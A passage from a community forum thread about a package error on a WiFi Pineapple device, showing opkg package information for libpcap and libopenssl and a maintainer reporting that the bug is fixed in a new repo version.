Maintainer: Felix Fietkau <nbd@openwrt.org>
MD5Sum: d3e3622bd50b7ab8d1c27b1f15a61dd5
Size: 83095
Filename: libpcap_1.5.3-1_ar71xx.ipk
Source: package/libs/libpcap
Description: This package contains a system-independent library for user-level network packet
 capture.

Package: libpcap
Version: 1.9.0-1
Depends: libc
Status: install user installed
Architecture: ar71xx
Installed-Time: 1534818086

root@Pineapple:~# opkg info libopenssl
Package: libopenssl
Version: 1.0.2g-1
Depends: libc, zlib
Status: unknown ok not-installed
Section: libs
Architecture: ar71xx
MD5Sum: d0fc4828f7029e1668dbd66cbb19a7f8
Size: 685049
Filename: libopenssl_1.0.2g-1_ar71xx.ipk
Source: package/libs/openssl
Description: The OpenSSL Project is a collaborative effort to develop a robust,
 commercial-grade, full-featured, and Open Source toolkit implementing the Secure
 Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well
 as a full-strength general purpose cryptography library.
 This package contains the OpenSSL shared libraries, needed by other programs.

Package: libopenssl
Version: 1.0.2m-1
Depends: libc, zlib
Status: install user installed
Architecture: ar71xx
Installed-Time: 1534818086

 

Share this post


Link to post
Share on other sites

Interesting. I also upgraded to the newest version, then i got the same error message as you guys.
I then tried downgrading to the exact same version i used before that, and surprise: same error.. WTF.
I'm getting  a beer. This needs to be squashed asap. Strange af.

  • Like 2

Share this post


Link to post
Share on other sites
5 minutes ago, Zylla said:

Interesting. I also upgraded to the newest version, then i got the same error message as you guys.
I then tried downgrading to the exact same version i used before that, and surprise: same error.. WTF.
I'm getting  a beer. This needs to be squashed asap. Strange af.

jupp, sounds to me like "have you tried to restart the device already?!" ? 

Share this post


Link to post
Share on other sites

I've found a "solution", but i'm not sure how to fix it yet properly and get it packaged easily. I need to go over some stuff in the Makefile for the SDK.
I've compiled a working version now. I just don't know why it doesn't work with the SDK.
But i'm sure i'll get it fixed asap.

  • Like 2

Share this post


Link to post
Share on other sites

Bug should be fixed now!
Uploaded new file, with new version to the repo. v4.2.1-3
Thanks for reporting it!
And please, report back any other errors you encounter! I'll do my best to fix them asap. As always ?

  • Upvote 1

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.

×